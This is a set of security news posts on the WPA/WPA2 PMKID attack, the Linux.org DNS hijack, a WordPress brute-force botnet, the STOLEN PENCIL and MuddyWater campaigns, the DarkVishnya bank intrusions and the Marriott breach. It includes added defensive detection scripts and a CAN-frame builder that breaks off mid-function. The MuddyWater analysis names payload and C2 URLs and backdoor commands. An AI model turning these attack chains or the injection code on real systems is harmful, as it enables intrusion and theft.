“At this time, we do not know for which vendors or for how many routers this technique will work, but we think it will work against all 802.11i/p/q/r networks with roaming functions enabled (most modern routers).” Steube concludes.

“The main advantages of this attack are as follows:

  • No more regular users required – because the attacker directly communicates with the AP (aka “client-less” attack)
  • No more waiting for a complete 4-way handshake between the regular user and the AP
  • No more eventual retransmissions of EAPOL frames (which can lead to uncrackable results)
  • No more eventual invalid passwords sent by the regular user
  • No more lost EAPOL frames when the regular user or the AP is too far away from the attacker
  • No more fixing of nonce and replaycounter values required (resulting in slightly higher speeds)
  • No more special output format (pcap, hccapx, etc.) – final data will appear as regular hex encoded string”.

Pierluigi Paganini

(Security Affairs – WiFi hack, hacking)

The post Expert devised a new WiFi hack that works on WPA/WPA2 appeared first on Security Affairs.




Hackers defaced Linux.org with DNS hijack

The Linux.org website was defaced last week via a DNS hijack: attackers broke into the associated registrar account and changed the DNS settings.

Attackers changed the defacement page a few times; they protested against the new Linux kernel developer code of conduct in a regrettable way, with racial slurs and the image of an individual showing the anus.


The defacement page also includes links and a Twitter account (@kitlol5) believed to be under the control of the attacker.

The person who was operating the Twitter account posted a screenshot showing that they had access to the Network Solutions account of Michelle McLagan, who evidently owns linux.org, and modified the DNS settings.

“This evening someone got into my partner’s netsol account and pointed linux.org DNS to their own cloudflare account. The production env (web / db) wasn’t touched. DNS was simply pointing to another box.” one of the Linux.org admins wrote on Reddit.

“She’s working with netsol to prove ownership, etc.. and we’re hoping things will be cleared up in the morning.”

The hacker did not access the servers hosting Linux.org and user data were not compromised.

How to prevent this kind of incident?

Administrators should enable multi-factor authentication (MFA) on their registrar accounts.

“I think it was a combination of public whois info and no MFA that lead to this,” added the Linux.org admin.

“There’s always one thing – they found the weakest link and exploited it.”

After the incident, admins have enabled MFA on all accounts.

Pierluigi Paganini

(Security Affairs – DNS hijack, hacking)

The post Hackers defaced Linux.org with DNS hijack appeared first on Security Affairs.

WordPress botnet composed of +20k installs targets other sites

Experts from security firm Wordfence discovered a botnet of 20,000 WordPress sites infecting other WordPress installs.

Experts from security firm Wordfence uncovered a botnet composed of over 20,000 WordPress sites that is being used to compromise other websites running on the popular CMS and recruit them.  

“The threat actors (hackers) use a group of four command and control (C2) servers to send requests to over 14,000 proxy servers provided by a Russian proxy provider called best-proxies[.]ru.” reads the analysis published by WordFence.

“They use these proxies to anonymize the C2 traffic. The requests pass through the proxy servers and are sent to over 20,000 infected WordPress sites. Those sites are running an attack script which attacks targeted WordPress sites.”

The botnet is used by attackers to carry out brute force attacks against other WordPress sites; according to Wordfence’s Defiant Threat Intelligence team, it has already generated over 5 million authentication requests. The bots attempt XML-RPC authentication against other WordPress sites in order to access privileged accounts.

The XML-RPC interface allows users to remotely post content to a WordPress site through the WordPress API or other APIs; it is exposed by the xmlrpc.php file in the root directory of a WordPress install.

Unfortunately, the XML-RPC interface does not implement rate limiting on the number of API requests that can be submitted, a gift for brute-force attackers.

A close look at the malicious infrastructure allowed the experts to discover that hackers used four command and control servers that issue commands to the bots through proxy servers at the Russian Best-Proxies.ru service.  Experts identified over 14,000 proxy servers used by the botmaster to anonymize the traffic.

Once a WordPress site is compromised it will start carrying out brute force attacks against the XML-RPC interface of other websites. 

“We also noted that the User-Agent strings associated with these requests matched those used by applications commonly seen interacting with the XML-RPC interface, like wp-iphone and wp-android,” continues the analysis.

“Since these applications typically store credentials locally, it was unusual to see a significant amount of failed logins from them, which drew our attention. We identified over 20,000 WordPress slave sites that were attacking other WordPress sites.”

Brute force scripts used by the attackers accept POST input from the C2 servers, the request includes domains to target and word lists to use when performing the brute force attacks.

It is also possible to supply new wordlists by providing a URL to the script.
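The User-Agent observation above suggests a simple access-log check a site operator can run. The following is an added example, not Wordfence’s tooling: it parses combined-format web server log lines, counts POSTs to xmlrpc.php per client inside a sliding one-minute window, and records whether the client claimed to be the wp-iphone or wp-android app. The log lines, addresses and the threshold are constructed for the example.

```python
"""Spotting the XML-RPC brute-force pattern described above in web server
access logs. Added example, not Wordfence's code; log lines are constructed
samples in Apache/nginx "combined" format."""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Optional

# One "combined" line: ip ident user [timestamp] "METHOD path proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"
# User-Agents of the mobile apps the analysis says the bots imitate
MOBILE_APP_UA = re.compile(r"\bwp-(iphone|android)\b", re.I)


def parse_line(line: str) -> Optional[dict]:
    """Parse one access-log line; return None for lines that do not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    return rec


def find_xmlrpc_bursts(lines: List[str], threshold: int = 5,
                       window: timedelta = timedelta(minutes=1)) -> Dict[str, dict]:
    """Flag client IPs that POST to xmlrpc.php at least `threshold` times inside any `window`.

    The HTTP status is deliberately ignored: a failed XML-RPC login is answered
    with 200 and a fault inside the XML body, so only the request rate is a
    usable signal at the access-log layer.
    """
    per_ip: Dict[str, list] = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST" or not rec["path"].endswith("/xmlrpc.php"):
            continue
        per_ip[rec["ip"]].append((rec["ts"], bool(MOBILE_APP_UA.search(rec["ua"]))))

    flagged: Dict[str, dict] = {}
    for ip, events in per_ip.items():
        events.sort()
        times = [t for t, _ in events]
        start = 0  # sliding window over the sorted timestamps
        for end in range(len(times)):
            while times[end] - times[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = {
                    "requests": len(events),
                    "mobile_app_ua": any(is_app for _, is_app in events),
                }
                break
    return flagged


# Constructed sample: six rapid POSTs from one source imitating the iPhone app,
# plus normal traffic that must not be flagged (RFC 5737 documentation addresses).
SAMPLE_LOG = """\
203.0.113.10 - - [07/Dec/2018:10:15:01 +0000] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "wp-iphone/11.4"
203.0.113.10 - - [07/Dec/2018:10:15:02 +0000] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "wp-iphone/11.4"
203.0.113.10 - - [07/Dec/2018:10:15:04 +0000] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "wp-iphone/11.4"
203.0.113.10 - - [07/Dec/2018:10:15:07 +0000] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "wp-iphone/11.4"
203.0.113.10 - - [07/Dec/2018:10:15:09 +0000] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "wp-iphone/11.4"
203.0.113.10 - - [07/Dec/2018:10:15:12 +0000] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "wp-iphone/11.4"
198.51.100.7 - - [07/Dec/2018:10:16:30 +0000] "POST /xmlrpc.php HTTP/1.1" 200 1220 "-" "wp-android/10.8"
198.51.100.7 - - [07/Dec/2018:10:19:05 +0000] "POST /xmlrpc.php HTTP/1.1" 200 1220 "-" "wp-android/10.8"
192.0.2.44 - - [07/Dec/2018:10:20:00 +0000] "GET /wp-login.php HTTP/1.1" 200 4521 "-" "Mozilla/5.0"
192.0.2.44 - - [07/Dec/2018:10:20:03 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for ip, info in find_xmlrpc_bursts(SAMPLE_LOG.splitlines()).items():
        print(f"{ip}: {info['requests']} xmlrpc.php POSTs, mobile-app UA: {info['mobile_app_ua']}")
```

The two legitimate wp-android posts a few minutes apart stay under the threshold, which is the point of windowing rather than counting totals. Since XML-RPC itself imposes no rate limit, the practical mitigation is to rate-limit requests to xmlrpc.php at the web server or, where the site does not need remote publishing, to block the endpoint outright.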

Wordfence reported its discovery to the authorities and is helping them to dismantle the WordPress botnet.

Pierluigi Paganini

(Security Affairs – WordPress Botnet, hacking)

The post WordPress botnet composed of +20k installs targets other sites appeared first on Security Affairs.


STOLEN PENCIL campaign, hackers target academic institutions.

STOLEN PENCIL campaign – North Korea-linked APT group has been targeting academic institutions since at least May of this year.

North Korea-linked threat actors are targeting academic institutions with spear phishing attacks. The phishing messages include a link to a website displaying a decoy document that attempts to trick users into installing a malicious Google Chrome extension. Many of the victims of this campaign, tracked as STOLEN PENCIL, were at multiple universities and had expertise in biomedical engineering.

Attackers ensure persistence using off-the-shelf tools, but according to NetScout they had poor OPSEC (i.e. Korean keyboards, open web browsers in Korean, English-to-Korean translators).

“The ultimate motivation behind the attacks is unclear, but the threat actors are adept at scavenging for credentials. Targets are sent spear phishing e-mails that lead them to a web site displaying a lure document and are immediately prompted to install a malicious Google Chrome extension.” reads the analysis published by the experts.

“Once gaining a foothold, the threat actors use off-the-shelf tools to ensure persistence, including Remote Desktop Protocol (RDP) to maintain access.”

Threat actors used many basic phishing pages; the more sophisticated ones, aimed at academia, displayed a benign PDF in an IFRAME and redirected users to a “Font Manager” extension from the Chrome Web Store.

The malicious extension loads JavaScript from a separate site; there the experts only found a file containing legitimate jQuery code, likely because the threat actors replaced the malicious code to hinder analysis. The extension allows the attacker to read data from every website the victim visits, which suggests the attackers were looking to steal browser cookies and passwords.

Experts pointed out that the attackers did not rely on malware to maintain access to the targets: the STOLEN PENCIL attackers used RDP to reach the compromised systems, and the researchers observed remote access occurring daily between 06:00 and 09:00 UTC (01:00-04:00 EST).

STOLEN PENCIL attackers also used a compromised or stolen certificate to sign several PE files used in the campaign. The researchers observed two signed sets of tools, dubbed MECHANICAL and GREASE. The former logs keystrokes and replaces Ethereum wallet addresses with one controlled by the attackers; the latter adds a Windows administrator account to the system and also enables RDP.
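As an added example (not NetScout’s code or any tooling from the report), the following Python sketches how the two host-side behaviours above can be spotted in Windows Security log data: an account that is created and added to the local Administrators group within minutes (the GREASE pattern) and RDP logons (logon type 10) landing in the 06:00-09:00 UTC window. The events are constructed samples; real 4732 events identify the new member by SID (MemberSid), which is simplified here to the account name.

```python
from datetime import datetime, timedelta, timezone

ADMINISTRATORS_SID = "S-1-5-32-544"  # well-known SID of the local Administrators group

# Constructed sample Windows Security events (dicts in the shape of the event data
# fields); not telemetry from the campaign. Real 4732 events carry the new member
# as a SID (MemberSid); the account name is used here to keep the sample short.
SAMPLE_EVENTS = [
    {"EventID": 4720, "Time": "2018-11-20T06:12:03Z", "TargetUserName": "support"},
    {"EventID": 4732, "Time": "2018-11-20T06:12:05Z", "MemberName": "support",
     "TargetSid": ADMINISTRATORS_SID},
    {"EventID": 4624, "Time": "2018-11-21T07:30:41Z", "TargetUserName": "support",
     "LogonType": 10, "IpAddress": "203.0.113.7"},
    {"EventID": 4624, "Time": "2018-11-21T14:02:10Z", "TargetUserName": "jdoe",
     "LogonType": 10, "IpAddress": "10.0.0.5"},
    {"EventID": 4624, "Time": "2018-11-21T08:15:00Z", "TargetUserName": "jdoe",
     "LogonType": 2},
]


def parse_time(stamp):
    """ISO-8601 UTC timestamp ('...Z') -> timezone-aware datetime."""
    return datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def find_new_local_admins(events, window=timedelta(minutes=10)):
    """Accounts created (4720) and then added to Administrators (4732) within
    `window`: the GREASE-style 'add an admin, enable RDP' pattern."""
    created = {}
    hits = []
    for ev in sorted(events, key=lambda e: parse_time(e["Time"])):
        when = parse_time(ev["Time"])
        if ev["EventID"] == 4720:
            created[ev["TargetUserName"]] = when
        elif ev["EventID"] == 4732 and ev.get("TargetSid") == ADMINISTRATORS_SID:
            name = ev["MemberName"]
            if name in created and when - created[name] <= window:
                hits.append(name)
    return hits


def find_rdp_logons_in_window(events, start_hour=6, end_hour=9):
    """RDP logons (4624 with logon type 10, RemoteInteractive) whose UTC hour
    falls in [start_hour, end_hour); defaults match the 06:00-09:00 UTC pattern."""
    hits = []
    for ev in events:
        if ev["EventID"] != 4624 or ev.get("LogonType") != 10:
            continue
        when = parse_time(ev["Time"])
        if start_hour <= when.hour < end_hour:
            hits.append((ev["TargetUserName"], ev.get("IpAddress"), ev["Time"]))
    return hits


if __name__ == "__main__":
    print("new local admins:", find_new_local_admins(SAMPLE_EVENTS))
    print("RDP logons 06-09 UTC:", find_rdp_logons_in_window(SAMPLE_EVENTS))
```

Both checks are deliberately narrow: the time-window rule only makes sense where an organisation knows its own RDP hours, and the admin-creation rule should be paired with an alert on the RDP service being enabled (the fDenyTSConnections registry value flipping to 0), which the sample does not model.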

The security researchers also discovered a ZIP archive containing tools for port scanning, memory and password dumping, and other hacking activities. The tools include KPortScan, PsExec, batch files for enabling RDP, Procdump, Mimikatz, the Eternal suite of exploits, and Nirsoft tools such as Mail PassView, Network Password Recovery, Remote Desktop PassView, SniffPass, and WebBrowserPassView.

The STOLEN PENCIL campaign likely represents only a small portion of the threat actor’s activity. The use of basic techniques, off-the-shelf programs, the cryptojacker the researchers found alongside the toolset, and the use of the Korean language suggest the actor is of North Korean origin, the security researchers say. 

“While we were able to gain insight into the threat actor’s TTPs (Tools, Techniques, & Procedures) behind STOLEN PENCIL, this is clearly just a small window into their activity. Their techniques are relatively basic, and much of their toolset consists of off-the-shelf programs and living off the land.” NetScout concludes. 

“This, along with the presence of the cryptojacker, is typical of DPRK tradecraft. Additionally, the operators’ poor OPSEC exposes their Korean language, in both viewed websites and keyboard selections.” 

Pierluigi Paganini

(Security Affairs – STOLEN PENCIL, hacking)

The post STOLEN PENCIL campaign, hackers target academic institutions. appeared first on Security Affairs.




Security Affairs

Banks Attacked through Malicious Hardware Connected to the Local Network

Kaspersky is reporting on a series of bank hacks -- called DarkVishnya -- perpetrated through malicious hardware being surreptitiously installed into the target network:

In 2017-2018, Kaspersky Lab specialists were invited to research a series of cybertheft incidents. Each attack had a common springboard: an unknown device directly connected to the company's local network. In some cases, it was the central office, in others a regional office, sometimes located in another country. At least eight banks in Eastern Europe were the targets of the attacks (collectively nicknamed DarkVishnya), which caused damage estimated in the tens of millions of dollars.

Each attack can be divided into several identical stages. At the first stage, a cybercriminal entered the organization's building under the guise of a courier, job seeker, etc., and connected a device to the local network, for example, in one of the meeting rooms. Where possible, the device was hidden or blended into the surroundings, so as not to arouse suspicion.

The devices used in the DarkVishnya attacks varied in accordance with the cybercriminals' abilities and personal preferences. In the cases we researched, it was one of three tools:

  • netbook or inexpensive laptop
  • Raspberry Pi computer
  • Bash Bunny, a special tool for carrying out USB attacks

Inside the local network, the device appeared as an unknown computer, an external flash drive, or even a keyboard. Combined with the fact that Bash Bunny is comparable in size to a USB flash drive, this seriously complicated the search for the entry point. Remote access to the planted device was via a built-in or USB-connected GPRS/3G/LTE modem.

Slashdot thread.
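As an added example, not part of Schneier’s post or Kaspersky’s report, the Python below takes a Linux-style `arp -a` listing and an asset inventory (both constructed here) and reports every MAC address seen on the wire that is not in the inventory, tagging the vendor from a small OUI table. B8:27:EB is the Raspberry Pi Foundation’s prefix registered with the IEEE; the inventory, the addresses and the rest of the table are placeholders.

```python
import re

# Constructed asset inventory (MAC -> hostname); in practice this comes from the
# CMDB, DHCP reservations or NAC. Not data from the Kaspersky investigation.
KNOWN_DEVICES = {
    "00:1a:2b:3c:4d:5e": "print-server-03",
    "3c:97:0e:11:22:33": "ws-accounting-12",
}

# Tiny OUI subset. b8:27:eb is the Raspberry Pi Foundation prefix registered with
# the IEEE; a real table would be loaded from the IEEE OUI list.
OUI_NAMES = {
    "b8:27:eb": "Raspberry Pi Foundation",
}

# Constructed `arp -a` output (Linux format) as seen from a host on the office VLAN.
SAMPLE_ARP_TABLE = """\
? (10.10.4.21) at 00:1a:2b:3c:4d:5e [ether] on eth0
? (10.10.4.37) at 3c:97:0e:11:22:33 [ether] on eth0
? (10.10.4.120) at b8:27:eb:aa:bb:cc [ether] on eth0
? (10.10.4.121) at 52:54:00:12:34:56 [ether] on eth0
"""

ARP_RE = re.compile(
    r"\((?P<ip>\d{1,3}(?:\.\d{1,3}){3})\) at (?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})",
    re.I,
)


def parse_arp(text):
    """(ip, mac) pairs from `arp -a` style lines; MACs normalised to lowercase."""
    return [(m["ip"], m["mac"].lower()) for m in ARP_RE.finditer(text)]


def find_rogue_devices(arp_text, known=KNOWN_DEVICES, oui=OUI_NAMES):
    """Every address on the wire that is not in the inventory, with the vendor
    guessed from the first three octets so a Pi or a laptop stands out."""
    rogue = []
    for ip, mac in parse_arp(arp_text):
        if mac in known:
            continue
        rogue.append({"ip": ip, "mac": mac, "vendor": oui.get(mac[:8], "unknown vendor")})
    return rogue


if __name__ == "__main__":
    for dev in find_rogue_devices(SAMPLE_ARP_TABLE):
        print(f"{dev['ip']:<14} {dev['mac']}  {dev['vendor']}")
```

This covers the netbook and Raspberry Pi cases, which have their own presence on the LAN. A Bash Bunny plugged into a workstation appears on that host as a USB keyboard or network adapter rather than as a separate station on the switch, so it needs host-side USB device auditing; on the network side, port security or 802.1X on meeting-room ports stops the planted device from getting a link at all.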

Security Affairs: Experts at Yoroi – Cybaze Z-Lab analyzed MuddyWater Infection Chain

Malware researchers at Yoroi – Cybaze Z-Lab analyzed the MuddyWater infection chain observed in the latest wave of cyber attacks.

Introduction

At the end of November, several Middle East countries were targeted by a new wave of attacks related to the Iranian APT group known as “MuddyWater”: their first campaign was observed back in 2017, and more recently Unit42 researchers reported attacks in the region. MuddyWater’s TTPs have stayed largely unchanged over this period: the group keeps using spear-phishing emails carrying a blurred document that induces the target to enable the execution of VBA macro code, which infects the host with the POWERSTATS malware.

Figure 1. Malicious document

According to the analysis of the ClearSky Research Team and TrendMicro researchers, at the end of November the MuddyWater group hit Lebanese and Omani institutions and, a few days later, Turkish entities. The attack vector and the final payload were the same: the usual macro-embedded document and the POWERSTATS backdoor, respectively.

However, the intermediate stages were slightly different than usual.

The Yoroi – Cybaze Z-Lab researchers analyzed the file “Cv.doc”, the blurred résumé used by MuddyWater during the Lebanon/Oman campaign.

Technical Analysis

When the victim enables macro execution, the malicious code creates an Excel document containing the code needed to download the next stage of the malicious implant. At the same time, it shows a fake error popup saying the Office version is incompatible.

Figure 2. Fake error message

The macro code is decrypted before execution with the following custom routine:

Figure 3. Macro decryption routine

After the deobfuscation of the code, it’s possible to identify the function used to create the hidden Excel document within the “x1” variable:

Figure 4. Creation of the hidden document

The macro placed in the new Excel document downloads PowerShell code from a URL that apparently references a PNG image file, “http://pazazta[.]com/app/icon.png”. The downloaded payload creates three new local files:

  • C:\Windows\Temp\temp.jpg, containing JavaScript code;
  • C:\Windows\Temp\Windows.vbe, containing an encoded Visual Basic script;
  • C:\ProgramData\Microsoft.db, containing the encrypted final payload.

Figure 5. Downloaded PowerShell code

As shown in the figure above, the first file to be executed is “Windows.vbe”, which simply runs the JavaScript code contained in temp.jpg through the CSCRIPT engine. After decryption, the purpose of the JS becomes clear: it delays the execution of another PowerShell payload.

Figure 6. Javascript code within “temp.jpg”

The next malicious stage is executed only when the “Math.round(ss) % 20 == 19” condition is met; otherwise the script keeps re-executing itself. The “ss” variable holds the number of seconds elapsed since 1 January 1970 00:00:00 UTC (the Unix epoch), so the gate opens for one second in every twenty.

The final stage consists in the execution of the POWERSTATS backdoor contained in the “Microsoft.db” file. The backdoor contacts two domain names, “hxxp://amphira[.]com” and “hxxps://amorenvena[.]com”, both resolving to the same IP address, 139.162.245.200 (EU-LINODE-20141229 US).

Figure 7. POWERSTATS beaconing requests

Once executed, the POWERSTATS malware sends generic information about the victim’s machine to the remote server through an encoded HTTP POST request:

Figure 8. Post request containing info about the victim machine

Then, it starts its communication protocol with the C2, asking for commands to execute on the compromised host.

The HTTP parameter “type” classifies the kind of request performed by the malicious implant; during the analysis the following values were observed:

  • info: used in POST request to send info about the victim;
  • live: used in POST request as ping mechanism;
  • cmd: used both in POST and GET requests. In the first case it sends the last command executed, in the second one it retrieves a new command from server;
  • res: used in a POST request to send the result of the last command that the malware has executed.

The parameter “id”, instead, uniquely identifies the victim machine; it is computed from local system information, whereas the sample analyzed by TrendMicro used only the hard drive serial number. The identifier is also used to name a file in the “C:\ProgramData\” folder that stores temporary information.
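As an added example, not code from Yoroi’s analysis or from the malware itself, here is a small Python classifier for the beacon protocol described above. It assumes the “type” and “id” parameters travel in the URL query string (the analysis does not say whether they sit in the query or in the POST body), uses a constructed request log against a placeholder host `c2.example`, and groups the recognised messages per victim id so that hosts the operator actually tasked can be told apart from hosts that only beaconed.

```python
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# (method, type) -> meaning, as observed in the analysis.
MESSAGE_KINDS = {
    ("POST", "info"): "victim info",
    ("POST", "live"): "keep-alive",
    ("GET", "cmd"): "fetch command",
    ("POST", "cmd"): "report last command",
    ("POST", "res"): "command result",
}

# Constructed request log (method, URL) against a placeholder host; not captured
# traffic. Assumes type/id are carried in the query string.
SAMPLE_REQUESTS = [
    ("POST", "http://c2.example/?type=info&id=3f2a1c"),
    ("POST", "http://c2.example/?type=live&id=3f2a1c"),
    ("GET", "http://c2.example/?type=cmd&id=3f2a1c"),
    ("POST", "http://c2.example/?type=cmd&id=3f2a1c"),
    ("POST", "http://c2.example/?type=res&id=3f2a1c"),
    ("GET", "http://c2.example/?type=cmd&id=9b77e0"),
    ("GET", "http://cdn.example/lib.js"),  # unrelated traffic, must be ignored
]


def classify(method, url):
    """Return (victim_id, message kind) for a POWERSTATS-style request, else None."""
    query = parse_qs(urlsplit(url).query)
    kind = MESSAGE_KINDS.get((method.upper(), query.get("type", [None])[0]))
    victim = query.get("id", [None])[0]
    return (victim, kind) if kind and victim else None


def sessions(requests):
    """Recognised messages in order of appearance, keyed by victim id."""
    per_victim = defaultdict(list)
    for method, url in requests:
        hit = classify(method, url)
        if hit:
            per_victim[hit[0]].append(hit[1])
    return dict(per_victim)


def tasked_victims(requests):
    """Victim ids that fetched a command and later posted a result: the operator
    actually worked on those hosts rather than just collecting beacons."""
    tasked = []
    for victim, kinds in sessions(requests).items():
        if "fetch command" in kinds:
            after_fetch = kinds[kinds.index("fetch command"):]
            if "command result" in after_fetch:
                tasked.append(victim)
    return tasked


if __name__ == "__main__":
    for victim, kinds in sessions(SAMPLE_REQUESTS).items():
        print(victim, "->", ", ".join(kinds))
    print("tasked:", tasked_victims(SAMPLE_REQUESTS))
```

Run against proxy logs, the “tasked” list is the triage order for incident response: a host that only ever sent `info` and `live` was compromised but idle, while one that went through `cmd` and `res` had an operator on it.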

Figure 9. Victim id creation

Analyzing the code extracted and deobfuscated from the “Microsoft.db” file makes it possible to investigate the real capabilities of the POWERSTATS backdoor and identify the functionalities supported by the implant, such as:

  • upload: the malware downloads a new file from the specified URL;
  • cmd: the malware executes the specified command;
  • b64: the malware decodes and executes a base64-encoded PowerShell script;
  • muddy: the malware creates a new encrypted file in “C:\ProgramData\LSASS” containing a PowerShell script and runs it.

Figure 10. Deobfuscated POWERSTATS code snippet

Persistence

The malware implements more than one persistence mechanism. These mechanisms are triggered only in the final stage of the infection, once the POWERSTATS backdoor is executed. The persistence functionalities use simple, well-known techniques such as redundant registry values under the “Microsoft\Windows\CurrentVersion\Run” key:

Figure 11. Registry key based persistence mechanism

And the creation of a scheduled task named “MicrosoftEdge”, run every day at 12:00.

Figure 12. Scheduled task installed by the malware

Conclusion

This latest campaign of the Iranian APT group “MuddyWater” is a clear example of how hacking groups can leverage built-in system tools and scripting languages to achieve their objectives, maintain a foothold within their target hosts and exfiltrate data. These attacks also use a macro-embedded document as the initial vector, showing how this “well-known” technique can still represent a relevant threat, especially if carefully prepared and contextualized to lure specific victims.

Figure 13.  MuddyWaters’ Infection chain 

Technical details, including indicators of compromise and Yara rules, are reported in the analysis published on the Yoroi blog: https://blog.yoroi.company/research/dissecting-the-muddywater-infection-chain/

Pierluigi Paganini

(Security Affairs – MuddyWater, APT)

The post Experts at Yoroi – Cybaze Z-Lab analyzed MuddyWater Infection Chain appeared first on Security Affairs.




Hackers conducting botnet attacks through 20k hacked WordPress sites

By Uzair Amir

Newly published research from Defiant, a WordPress security firm, reveals that a botnet of over 20,000 already compromised WordPress sites is hunting for further WordPress sites. As new sites are infected, they automatically become part of the bot army and start acting on the attackers’ directions to perform tasks like brute […]

This is a post from HackRead.com Read the original post: Hackers conducting botnet attacks through 20k hacked WordPress sites

415,000 routers infected by cryptomining malware – Prime target MikroTik

By Waqas

According to a new report, around 415,000 routers throughout the world are infected with malware that steals computing resources to discreetly mine cryptocurrency. The campaign is still active and primarily targets MikroTik routers. Researchers say the cryptojacking attacks started in August and in the first string of […]

This is a post from HackRead.com Read the original post: 415,000 routers infected by cryptomining malware – Prime target MikroTik

Evidence in Marriott’s subsidiary Starwood hack points out to China intel

According to a report published by Reuters, the massive Marriott data breach was carried out by Chinese state-sponsored hackers.

According to Reuters, people investigating the Marriott data breach believe it is the result of a cyberattack carried out by Chinese hackers.

Last week Marriott International announced that hackers had compromised the guest reservation database of its Starwood subsidiary and stolen personal details of about 500 million guests.

Sources quoted by the news agency said the attack was carried out by Chinese intelligence as an information-gathering operation.

“Hackers behind a massive breach at hotel group Marriott International Inc left clues suggesting they were working for a Chinese government intelligence gathering operation, according to sources familiar with the matter.” reads the article published by the Reuters.

“Private investigators looking into the breach have found hacking tools, techniques and procedures previously used in attacks attributed to Chinese hackers, said three sources who were not authorized to discuss the company’s private probe into the attack.”

The attribution of the Marriott data breach is based on the analysis of tactics, techniques, and procedures (TTPs) that were previously associated with Chinese APT groups.

Reuters’ sources also cautioned that some of the tools were not used exclusively by Chinese attackers. Attribution is made harder by the fact that the intrusion dates back to 2014, which means other threat actors may have gained access to the Starwood systems since then.

Relations between China and the US are already strained; the US Government has repeatedly accused Beijing of cyber espionage against Western entities.

Chinese authorities denied any involvement in the alleged cyber espionage operations.

“China firmly opposes all forms of cyber attack and cracks down on them in accordance with law,” Chinese Ministry of Foreign Affairs spokesman Geng Shuang told Reuters. “If offered evidence, the relevant Chinese departments will carry out investigations according to law.”

Starwood Data Breach

Marriott International bought Starwood Hotels and Resorts Worldwide in 2016 for $13 billion. The brand includes St. Regis, Sheraton Hotels & Resorts, W Hotels, Westin Hotels & Resorts, Aloft Hotels, Tribute Portfolio, Element Hotels, Le Méridien Hotels & Resorts, The Luxury Collection, Four Points by Sheraton and Design Hotels.

According to the company, hackers had had access to Starwood’s guest reservation system since 2014 and had copied and encrypted the information.

The intrusion was detected on September 8 when a monitoring system found evidence regarding an attempt to access the Starwood guest reservation database in the United States. Two months later, on November 19, an investigation confirmed the intrusion into the archive containing “guest information relating to reservations at Starwood properties on or before September 10, 2018.”

For about 327 million of the affected guests, the compromised records include names, mailing addresses, phone numbers, email addresses, passport numbers, dates of birth, genders, arrival and departure information, and reservation dates.

Pierluigi Paganini

(Security Affairs – Marriott data breach, hacking)

The post Evidence in Marriott’s subsidiary Starwood hack points out to China intel appeared first on Security Affairs.

Toyota presented PASTA (Portable Automotive Security Testbed) Car-Hacking Tool

Takuya Yoshida from Toyota’s InfoTechnology Center and his colleague Tsuyoshi Toyama are members of a Toyota team that developed the new tool, called PASTA (Portable Automotive Security Testbed).

PASTA is an open-source testing platform specifically designed for car hacking, it was developed to help experts to test cyber security features of modern vehicles.

At Black Hat Europe 2018, held in London, the duo presented the tool and confirmed that Toyota plans to share the specifications on GitHub and will start selling the fully built system in Japan.

The PASTA car hacking tool is contained in an 8 kg portable briefcase. The experts highlighted how late the automotive industry has been in developing cyber security for modern cars.

“The researchers integrated the tool with a driving simulator program, as well as with a model car to demonstrate some ways it can be used. PASTA also can be used for R&D purposes with real vehicles: that would allow a carmaker to test how a third party feature would affect the vehicle and its security, or reprogram firmware, for example.” reported DarkReading.

[Image: the PASTA testbed. Source: Dark Reading]

Taking a closer look at the PASTA case, we find four ECUs inside, as well as a console to run tests of the car system’s operation or to carry out attacks, for example injecting CAN messages.

“There was a delay in the development of cybersecurity in the automobile industry; [it’s] late,” explained Toyama.

Now automakers including Toyota are preparing for next-generation attacks, he said, but there remains a lack of security engineers that understand auto technology.

The tool allows researchers to test communications among vehicle components over the CAN bus and to analyze how the vehicle’s electronic control units (ECUs) operate.

Note that PASTA was not designed for remote hacking scenarios like the one presented by the security duo Charlie Miller and Chris Valasek in 2015, when they remotely hacked a Fiat Chrysler connected car.

PASTA implements a simulation for remote operation of vehicle components and features, including wheels, brakes, windows, and other car functionalities.

“It’s small and portable so users can study, research, and hack with it anywhere.” continues the expert.

PASTA supports connections to OBD-II and RS232C ports, plus a port for debugging or binary hacking.
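As an added example, not PASTA’s own code, the following Python packs and parses classic CAN frames in the 16-byte SocketCAN `can_frame` layout and builds the kind of OBD-II engine-RPM request one would inject through the OBD-II port of a testbed like this. The frames are constructed here; the 0x7DF/0x7E8 identifiers and the RPM formula come from the OBD-II standard, not from the PASTA paper.

```python
import struct

CAN_EFF_FLAG = 0x80000000  # set in can_id for extended (29-bit) identifiers
CAN_SFF_MASK = 0x000007FF  # standard 11-bit identifier mask
CAN_EFF_MASK = 0x1FFFFFFF  # extended 29-bit identifier mask
FRAME_FMT = "=IB3x8s"      # SocketCAN struct can_frame: u32 can_id, u8 dlc, 3 pad, 8 data

OBD_REQUEST_ID = 0x7DF     # OBD-II functional (broadcast) request identifier
OBD_RESPONSE_ID = 0x7E8    # response identifier of the first ECU (usually the engine)
PID_ENGINE_RPM = 0x0C      # mode 01 PID for engine RPM


def build_frame(can_id, data, extended=False):
    """Pack a classic CAN frame (at most 8 data bytes) into the can_frame layout."""
    data = bytes(data)
    if len(data) > 8:
        raise ValueError("classic CAN carries at most 8 data bytes")
    id_mask = CAN_EFF_MASK if extended else CAN_SFF_MASK
    if can_id & ~id_mask:
        raise ValueError("identifier does not fit the selected id width")
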